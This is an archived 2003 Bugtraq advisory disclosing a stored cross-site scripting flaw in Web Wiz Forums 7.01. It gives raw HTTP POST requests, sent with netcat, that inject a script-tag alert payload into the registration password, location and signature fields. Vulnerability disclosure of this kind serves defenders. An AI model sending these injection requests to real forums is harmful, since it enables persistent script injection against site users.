| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 13 Nov 2003 22:37:23 +0300
From: HEX <hex@....net.ru>
To: bugtraq@...urityfocus.com, info@...wizguide.info
Subject: Web Wiz Forums ver. 7.01
Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Website : http://www.webwizforums.com
Problems : Permanent XSS
Objects :
°°°°°°°
- register_new_user.asp
- register.asp
The values variable are not filtered:
strLocation = Request.Form("location")
strMessage = Request.Form("signature")
strPassword = Request.Form("password")
Exploits :
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF
P.S. The value NAME should coincide with whose that by a nick from a forum !!!
Example:
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF
Patch/More Details :
°°°°°°°°°°°°°°°°°°
There was no opportunity to check up it on the version 7.5 and 7.51 :(
Waiting for the reply from technical support at http://www.webwizforums.com ...
[ Local time 21:50 | Пpоклятая йцукен, и как с ней только люди живут... ]
[ Copyright by [HEX] | mailto:hex@....net.ru ]
Powered by blists - more mailing lists